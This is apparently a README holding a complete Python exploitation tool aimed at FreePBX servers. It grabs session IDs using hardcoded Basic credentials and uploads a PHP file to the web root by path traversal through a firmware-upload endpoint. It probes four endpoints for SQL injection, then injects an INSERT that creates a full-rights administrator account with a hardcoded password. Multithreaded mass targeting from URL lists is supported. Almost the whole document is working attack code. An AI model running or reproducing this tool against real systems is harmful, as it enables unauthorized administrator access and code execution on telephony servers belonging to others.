README.md
Rendering markdown...
#!/usr/bin/env python3
"""
FreePBX Vulnerability Scanner
Supports PHPSESSID extraction, file upload, and SQL injection detection
"""
import argparse
import sys
import threading
import requests
import base64
from urllib.parse import urlparse, quote
from typing import Optional, List
import re
import time
from datetime import datetime
# Disable SSL warnings
requests.packages.urllib3.disable_warnings()
def print_banner():
"""Print ASCII art banner"""
banner = """
╔═══════════════════════════════════════════════════════════════════╗
║ ║
║ ███████╗██████╗ ███████╗███████╗██████╗ ██████╗ ██╗ ██╗ ║
║ ██╔════╝██╔══██╗██╔════╝██╔════╝██╔══██╗██╔══██╗╚██╗██╔╝ ║
║ █████╗ ██████╔╝█████╗ █████╗ ██████╔╝██████╔╝ ╚███╔╝ ║
║ ██╔══╝ ██╔══██╗██╔══╝ ██╔══╝ ██╔═══╝ ██╔══██╗ ██╔██╗ ║
║ ██║ ██║ ██║███████╗███████╗██║ ██████╔╝██╔╝ ██╗ ║
║ ╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ║
║ ║
║ Vulnerability Scanner & Exploitation Tool ║
║ Version 1.0 | 2024 ║
║ ║
╚═══════════════════════════════════════════════════════════════════╝
"""
print(banner)
class VulnerabilityResult:
"""Store vulnerability check results"""
def __init__(self, url: str):
self.url = url
self.phpsessid_obtained = False
self.upload_success = False
self.sql_injection_detected = False
self.sql_injection_exploited = False
self.timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
self.details = []
def add_detail(self, message: str):
"""Add detailed information"""
self.details.append(message)
def is_vulnerable(self) -> bool:
"""Check if any vulnerability was found"""
return (self.phpsessid_obtained or self.upload_success or
self.sql_injection_detected or self.sql_injection_exploited)
def get_summary(self) -> str:
"""Get result summary"""
status = []
if self.phpsessid_obtained:
status.append("PHPSESSID")
if self.upload_success:
status.append("File Upload")
if self.sql_injection_detected:
status.append("SQL Injection Detected")
if self.sql_injection_exploited:
status.append("SQL Injection Exploited")
if status:
return f"VULNERABLE: {', '.join(status)}"
else:
return "NOT VULNERABLE"
class FreePBXScanner:
def __init__(self, debug: bool = False):
self.debug = debug
self.results = []
self.lock = threading.Lock()
def log_debug(self, title: str, content: str):
"""Debug logging output"""
if self.debug:
print(f"\n{'='*60}")
print(f"[DEBUG] {title}")
print(f"{'='*60}")
print(content)
print(f"{'='*60}\n")
def log_status(self, status: str, message: str):
"""Log status message with color coding"""
colors = {
'SUCCESS': '\033[92m', # Green
'FAIL': '\033[91m', # Red
'INFO': '\033[94m', # Blue
'WARNING': '\033[93m', # Yellow
'VULN': '\033[95m' # Magenta
}
reset = '\033[0m'
color = colors.get(status, '')
print(f"{color}[{status}]{reset} {message}")
def get_phpsessid(self, url: str, result: VulnerabilityResult) -> Optional[str]:
"""
Step 1: Extract PHPSESSID from session cookie
"""
target_url = f"{url}/admin/config.php"
headers = {
'Referer': target_url,
'Authorization': 'Basic YWRtaW46YWRtaW4=',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
}
try:
if self.debug:
self.log_debug("Request Headers - PHPSESSID Extraction",
f"URL: {target_url}\n" +
"\n".join([f"{k}: {v}" for k, v in headers.items()]))
response = requests.get(
target_url,
headers=headers,
verify=False,
timeout=10,
allow_redirects=False
)
if self.debug:
response_headers = "\n".join([f"{k}: {v}" for k, v in response.headers.items()])
self.log_debug("Response Headers - PHPSESSID Extraction", response_headers)
response_body = response.text.split('\n')[:10]
self.log_debug("Response Body (first 10 lines)", "\n".join(response_body))
# Extract PHPSESSID from Set-Cookie header
cookies = response.headers.get('Set-Cookie', '')
match = re.search(r'PHPSESSID=([^;]+)', cookies)
if match:
phpsessid = match.group(1)
self.log_status('SUCCESS', f'{url} - PHPSESSID obtained: {phpsessid}')
result.phpsessid_obtained = True
result.add_detail(f"PHPSESSID: {phpsessid}")
return phpsessid
else:
self.log_status('FAIL', f'{url} - PHPSESSID not found')
return None
except Exception as e:
self.log_status('FAIL', f'{url} - PHPSESSID extraction failed: {str(e)}')
return None
def upload_exploit(self, url: str, phpsessid: str, result: VulnerabilityResult) -> bool:
"""
Step 2: Attempt file upload exploit using PHPSESSID
"""
target_url = f"{url}/admin/ajax.php?module=endpoint&command=upload_cust_fw"
boundary = "----geckoformboundaryccb9f95c9e4119dba1ec857b71f857d7"
randomstring = "cghsiauyh%&&sad1"
file = "text1.php"
headers = {
'Referer': f"{url}/admin/config.php?display=endpoint&view=custfwupgrade",
'Authorization': 'Basic cmFuZG9tOnJhbmRvbQ==',
'Cookie': f'PHPSESSID={phpsessid};',
'Content-Type': f'multipart/form-data; boundary={boundary}',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
}
# Construct multipart/form-data request body
body = (
f'------{boundary}\r\n'
f'Content-Disposition: form-data; name="dzuuid"\r\n'
f'\r\n'
f'48069f49-c03e-4182-81f7-48e36622e0d3\r\n'
f'------{boundary}\r\n'
f'Content-Disposition: form-data; name="dzchunkindex"\r\n'
f'\r\n'
f'0\r\n'
f'------{boundary}\r\n'
f'Content-Disposition: form-data; name="dztotalfilesize"\r\n'
f'\r\n'
f'3292\r\n'
f'------{boundary}\r\n'
f'Content-Disposition: form-data; name="dzchunksize"\r\n'
f'\r\n'
f'2000000\r\n'
f'------{boundary}\r\n'
f'Content-Disposition: form-data; name="dztotalchunkcount"\r\n'
f'\r\n'
f'1\r\n'
f'------{boundary}\r\n'
f'Content-Disposition: form-data; name="dzchunkbyteoffset"\r\n'
f'\r\n'
f'0\r\n'
f'------{boundary}\r\n'
f'Content-Disposition: form-data; name="fwbrand"\r\n'
f'\r\n'
f'../../../var/www/html\r\n'
f'------{boundary}\r\n'
f'Content-Disposition: form-data; name="fwmodel"\r\n'
f'\r\n'
f'1\r\n'
f'------{boundary}\r\n'
f'Content-Disposition: form-data; name="fwversion"\r\n'
f'\r\n'
f'1\r\n'
f'------{boundary}\r\n'
f'Content-Disposition: form-data; name="file"; filename="{file}"\r\n'
f'Content-Type: application/octet-stream\r\n'
f'<html>\r\n'
f'<body>\r\n'
f'<?php\r\n'
f'echo {randomstring};\r\n'
f'?>\r\n'
f'</body>\r\n'
f'</html>\r\n'
f'------{boundary}\r\n--\r\n'
)
try:
if self.debug:
self.log_debug("Request Headers - File Upload",
f"URL: {target_url}\n" +
"\n".join([f"{k}: {v}" for k, v in headers.items()]))
self.log_debug("Request Body - File Upload", body)
response = requests.post(
target_url,
headers=headers,
data=body,
verify=False,
timeout=10
)
if self.debug:
response_headers = "\n".join([f"{k}: {v}" for k, v in response.headers.items()])
self.log_debug("Response Headers - File Upload", response_headers)
response_body = response.text.split('\n')[:10]
self.log_debug("Response Body (first 10 lines)", "\n".join(response_body))
# Check if upload was successful
if '{"status":true}' in response.text:
self.log_status('SUCCESS', f'{url} - File uploaded successfully (Status: {response.status_code})')
file_url = f"{url}/{file}"
# Verify uploaded file
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
}
try:
if self.debug:
self.log_debug("Request Headers - Verify Upload",
f"URL: {file_url}\n" +
"\n".join([f"{k}: {v}" for k, v in headers.items()]))
verify_response = requests.get(
file_url,
headers=headers,
verify=False,
timeout=10
)
if self.debug:
response_headers = "\n".join([f"{k}: {v}" for k, v in verify_response.headers.items()])
self.log_debug("Response Headers - Verify Upload", response_headers)
response_body = verify_response.text.split('\n')[:10]
self.log_debug("Response Body (first 10 lines)", "\n".join(response_body))
if randomstring in verify_response.text:
self.log_status('VULN', f'{url} - File upload VERIFIED and accessible at {file_url}')
result.upload_success = True
result.add_detail(f"Uploaded file: {file_url}")
return True
else:
self.log_status('WARNING', f'{url} - File uploaded but verification failed')
return False
except Exception as e:
self.log_status('FAIL', f'{url} - File verification failed: {str(e)}')
return False
else:
self.log_status('FAIL', f'{url} - File upload failed (Status: {response.status_code})')
return False
except Exception as e:
self.log_status('FAIL', f'{url} - Upload request failed: {str(e)}')
return False
def check_sql_injection(self, url: str, result: VulnerabilityResult,
endpoint: str, payload: str, description: str) -> bool:
"""
Generic SQL injection detection
Checks response for: Exception, SQLSTATE, syntax, endpoint
"""
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept-Encoding': 'gzip',
'Authorization': 'Basic YWRtaW46YWRtaW4='
}
try:
if self.debug:
self.log_debug(f"Request Headers - {description}",
f"URL: {url}{endpoint}\n" +
"\n".join([f"{k}: {v}" for k, v in headers.items()]))
self.log_debug(f"Request Body - {description}", payload)
response = requests.post(
f"{url}{endpoint}",
headers=headers,
data=payload,
verify=False,
timeout=10
)
if self.debug:
response_headers = "\n".join([f"{k}: {v}" for k, v in response.headers.items()])
self.log_debug(f"Response Headers - {description}", response_headers)
response_body = response.text.split('\n')[:10]
self.log_debug(f"Response Body (first 10 lines)", "\n".join(response_body))
# Check for SQL error indicators
response_text = response.text.lower()
keywords = ['exception', 'sqlstate', 'syntax', 'endpoint']
found_keywords = [kw for kw in keywords if kw in response_text]
if found_keywords:
self.log_status('VULN', f'{url} - SQL Injection detected in {description} (Keywords: {", ".join(found_keywords)})')
result.sql_injection_detected = True
result.add_detail(f"SQL Injection in {description}: {', '.join(found_keywords)}")
return True
else:
self.log_status('INFO', f'{url} - No SQL injection detected in {description}')
return False
except Exception as e:
self.log_status('FAIL', f'{url} - SQL injection check failed ({description}): {str(e)}')
return False
def test_all_sql_injections(self, url: str, result: VulnerabilityResult) -> bool:
"""
Test all SQL injection endpoints from the document
"""
self.log_status('INFO', f'{url} - Starting SQL injection tests...')
any_vulnerable = False
# Test 1: basestation endpoint
endpoint1 = "/admin/config.php?display=endpoint&new=1&view=basestation"
payload1 = "id=&name='AD&brand=Sangoma&template=sangoma_default&mac=aabbccddeeff&ac=&repeater1=&repeater2=&repeater3=&multicell=no&sync_chain_id=512&sync_time=60&sync_data_transport=multicast&primary_data_sync_ip=0.0.0.0&sync_debug_enable=0&action=save_basestation"
if self.check_sql_injection(url, result, endpoint1, payload1, "Basestation"):
any_vulnerable = True
# Test 2: firmware endpoint
endpoint2 = "/admin/config.php?display=endpoint&view=firmware&brand=aastra"
payload2 = "brand='aastra&customfw=1&action=save_firmware&slot1=0.01&slot2=1.09"
if self.check_sql_injection(url, result, endpoint2, payload2, "Firmware"):
any_vulnerable = True
# Test 3: basefile endpoint
endpoint3 = "/admin/config.php?display=endpoint&view=basefile&template=test&brand=aastra&model=6865i"
payload3 = "models%5B%5D='6865i&brand=aastra&id=&template=test&edited=&action=changeBasefile&OID=¶m=test&value=value"
if self.check_sql_injection(url, result, endpoint3, payload3, "Basefile"):
any_vulnerable = True
# Test 4: customExt endpoint
endpoint4 = "/admin/config.php?display=endpoint&view=customExt&new=1"
payload4 = "id='"
if self.check_sql_injection(url, result, endpoint4, payload4, "CustomExt"):
any_vulnerable = True
return any_vulnerable
def exploit_sql_injection(self, url: str, result: VulnerabilityResult) -> bool:
"""
Exploit SQL injection vulnerability
Execute malicious SQL INSERT operation
"""
target_url = f"{url}/admin/config.php?display=endpoint&view=customExt"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept-Encoding': 'gzip',
'Authorization': 'Basic YWRtaW46YWRtaW4='
}
# Prepare data
username = "textuser"
password = "J7t!qZ@4mX2$wK9u#bF1^pL6"
sections = "*"
# Convert to hexadecimal (with 0x prefix)
hex_username = '0x' + username.encode('utf-8').hex()
hex_password = '0x' + password.encode('utf-8').hex()
hex_sections = '0x' + sections.encode('utf-8').hex()
# Combine hex values
hex_values = f"{hex_username},{hex_password},{hex_sections}"
# Construct payload
payload_raw = f"1';INSERT INTO ampusers (username, password_sha1, sections) VALUES ({hex_values})#"
# URL encode payload
payload_encoded = quote(payload_raw)
# Construct request body
request_body = f"id={payload_encoded}"
try:
if self.debug:
print(f"\n[*] Encoding Process:")
print(f" Username: {username}")
print(f" Hex: {hex_username}")
print(f" Password: {password}")
print(f" Hex: {hex_password}")
print(f" Sections: {sections}")
print(f" Hex: {hex_sections}")
print(f" Combined: {hex_values}")
print(f" Raw payload: {payload_raw}")
print(f" URL encoded: {payload_encoded}")
self.log_debug("Request Headers - SQL Injection Exploit",
f"URL: {target_url}\n" +
"\n".join([f"{k}: {v}" for k, v in headers.items()]))
self.log_debug("Request Body - SQL Injection Exploit", request_body)
response = requests.post(
target_url,
headers=headers,
data=request_body,
verify=False,
timeout=10
)
if self.debug:
response_headers = "\n".join([f"{k}: {v}" for k, v in response.headers.items()])
self.log_debug("Response Headers - SQL Injection Exploit", response_headers)
response_body = response.text.split('\n')[:10]
self.log_debug("Response Body (first 10 lines)", "\n".join(response_body))
self.log_status('VULN', f'{url} - SQL injection exploited | Username: {username} | Password: {password}')
result.sql_injection_exploited = True
result.add_detail(f"Injected user: {username}, password: {password}")
return True
except Exception as e:
self.log_status('FAIL', f'{url} - SQL injection exploitation failed: {str(e)}')
return False
def sql_injection_workflow(self, url: str, result: VulnerabilityResult) -> bool:
"""
Complete SQL injection workflow:
1. Test all SQL injection endpoints
2. If vulnerable, execute exploitation
"""
self.log_status('INFO', f'{url} - Starting SQL injection workflow')
# Step 1: Test for SQL injection
if self.test_all_sql_injections(url, result):
self.log_status('SUCCESS', f'{url} - SQL injection vulnerability confirmed, proceeding to exploit...')
# Step 2: Execute SQL injection exploit
return self.exploit_sql_injection(url, result)
else:
self.log_status('INFO', f'{url} - No SQL injection vulnerabilities detected, skipping exploit')
return False
def process_url(self, url: str, mode: str = 'all'):
"""
Process a single URL
"""
# Ensure URL format is correct
if not url.startswith(('http://', 'https://')):
url = f'http://{url}'
print(f"\n{'='*70}")
self.log_status('INFO', f'Processing target: {url}')
print(f"{'='*70}")
result = VulnerabilityResult(url)
if mode == 'all':
# Execute complete exploitation workflow
phpsessid = self.get_phpsessid(url, result)
if phpsessid:
self.upload_exploit(url, phpsessid, result)
self.sql_injection_workflow(url, result)
elif mode == 'upload':
phpsessid = self.get_phpsessid(url, result)
if phpsessid:
self.upload_exploit(url, phpsessid, result)
elif mode == 'sql':
self.sql_injection_workflow(url, result)
elif mode == 'auth':
self.sql_injection_workflow(url, result)
# Store result
with self.lock:
self.results.append(result)
# Print summary for this URL
print(f"\n{'-'*70}")
print(f"Summary for {url}: {result.get_summary()}")
print(f"{'-'*70}\n")
def worker(self, urls: List[str], mode: str):
"""
Worker thread
"""
while urls:
try:
url = urls.pop(0)
self.process_url(url, mode)
except IndexError:
break
except Exception as e:
self.log_status('FAIL', f'Thread error: {str(e)}')
def run(self, urls: List[str], threads: int = 1, mode: str = 'all'):
"""
Execute main workflow
"""
print(f"\n[*] Starting scan")
print(f"[*] Total targets: {len(urls)}")
print(f"[*] Thread count: {threads}")
print(f"[*] Scan mode: {mode.upper()}")
print(f"[*] Timestamp: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
if threads == 1:
# Single-threaded mode
for url in urls:
self.process_url(url, mode)
else:
# Multi-threaded mode
url_list = list(urls)
thread_list = []
for i in range(min(threads, len(url_list))):
t = threading.Thread(target=self.worker, args=(url_list, mode))
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
vulnerable_count = sum(1 for r in self.results if r.is_vulnerable())
print(f"\n{'='*70}")
print(f"[*] Scan completed")
print(f"[*] Total scanned: {len(self.results)}")
print(f"[*] Vulnerable: {vulnerable_count}")
print(f"[*] Not vulnerable: {len(self.results) - vulnerable_count}")
print(f"{'='*70}\n")
def save_results(self, output_file: str):
"""
Save scan results to file
"""
try:
with open(output_file, 'w', encoding='utf-8') as f:
f.write("="*80 + "\n")
f.write("FreePBX Vulnerability Scanner - Results Report\n")
f.write(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
f.write("="*80 + "\n\n")
# Summary section
vulnerable_results = [r for r in self.results if r.is_vulnerable()]
f.write(f"SUMMARY\n")
f.write(f"{'-'*80}\n")
f.write(f"Total Scanned: {len(self.results)}\n")
f.write(f"Vulnerable: {len(vulnerable_results)}\n")
f.write(f"Not Vulnerable: {len(self.results) - len(vulnerable_results)}\n")
f.write(f"\n")
# Vulnerable targets section
if vulnerable_results:
f.write(f"VULNERABLE TARGETS\n")
f.write(f"{'-'*80}\n\n")
for result in vulnerable_results:
f.write(f"URL: {result.url}\n")
f.write(f"Timestamp: {result.timestamp}\n")
f.write(f"Status: {result.get_summary()}\n")
# Vulnerability details
if result.phpsessid_obtained:
f.write(f" [+] PHPSESSID Obtained: YES\n")
if result.upload_success:
f.write(f" [+] File Upload: SUCCESS\n")
if result.sql_injection_detected:
f.write(f" [+] SQL Injection: DETECTED\n")
if result.sql_injection_exploited:
f.write(f" [+] SQL Injection: EXPLOITED\n")
# Additional details
if result.details:
f.write(f"\n Details:\n")
for detail in result.details:
f.write(f" - {detail}\n")
f.write(f"\n{'-'*80}\n\n")
# Non-vulnerable targets section
safe_results = [r for r in self.results if not r.is_vulnerable()]
if safe_results:
f.write(f"NON-VULNERABLE TARGETS\n")
f.write(f"{'-'*80}\n\n")
for result in safe_results:
f.write(f"URL: {result.url}\n")
f.write(f"Timestamp: {result.timestamp}\n")
f.write(f"Status: NOT VULNERABLE\n\n")
self.log_status('SUCCESS', f'Results saved to: {output_file}')
print(f"[*] Vulnerable targets: {len(vulnerable_results)}/{len(self.results)}")
except Exception as e:
self.log_status('FAIL', f'Failed to save results: {str(e)}')
def main():
parser = argparse.ArgumentParser(
description='FreePBX Vulnerability Scanner - Multi-mode exploitation tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Usage Examples:
Single target:
python3 freepbx_scanner.py -u http://10.2.21.156
Batch targets:
python3 freepbx_scanner.py -l targets.txt -t 10
Debug mode:
python3 freepbx_scanner.py -u http://10.2.21.156 -d
Save results:
python3 freepbx_scanner.py -l targets.txt -o results.txt
SQL injection only:
python3 freepbx_scanner.py -u http://10.2.21.156 --mode sql
File upload only:
python3 freepbx_scanner.py -u http://10.2.21.156 --mode upload
Scan Modes:
all - Run all checks (default)
upload - File upload vulnerability only
sql - SQL injection detection and exploitation
auth - Authentication bypass (SQL injection)
"""
)
# Argument definitions
parser.add_argument('-u', '--url', type=str, help='Single target URL')
parser.add_argument('-l', '--list', type=str, help='File containing list of target URLs (one per line)')
parser.add_argument('-t', '--threads', type=int, default=1, help='Number of threads (default: 1)')
parser.add_argument('-o', '--output', type=str, help='Save results to output file')
parser.add_argument('-d', '--debug', action='store_true',
help='Enable debug mode (show headers, request/response bodies)')
parser.add_argument('--mode', type=str, choices=['all', 'upload', 'sql', 'auth'], default='all',
help='Scan mode: all (default), upload, sql, auth')
args = parser.parse_args()
# Print banner
print_banner()
# Argument validation
if not args.url and not args.list:
parser.print_help()
sys.exit(1)
# Collect target URLs
urls = []
if args.url:
urls.append(args.url)
if args.list:
try:
with open(args.list, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if line and not line.startswith('#'):
urls.append(line)
except Exception as e:
print(f"[-] Failed to read file: {str(e)}")
sys.exit(1)
if not urls:
print("[-] No valid target URLs found")
sys.exit(1)
# Create scanner instance
scanner = FreePBXScanner(debug=args.debug)
# Execute scan
try:
scanner.run(urls, threads=args.threads, mode=args.mode)
except KeyboardInterrupt:
print("\n[!] Scan interrupted by user")
sys.exit(0)
# Save results if output file specified
if args.output:
scanner.save_results(args.output)
if __name__ == '__main__':
main()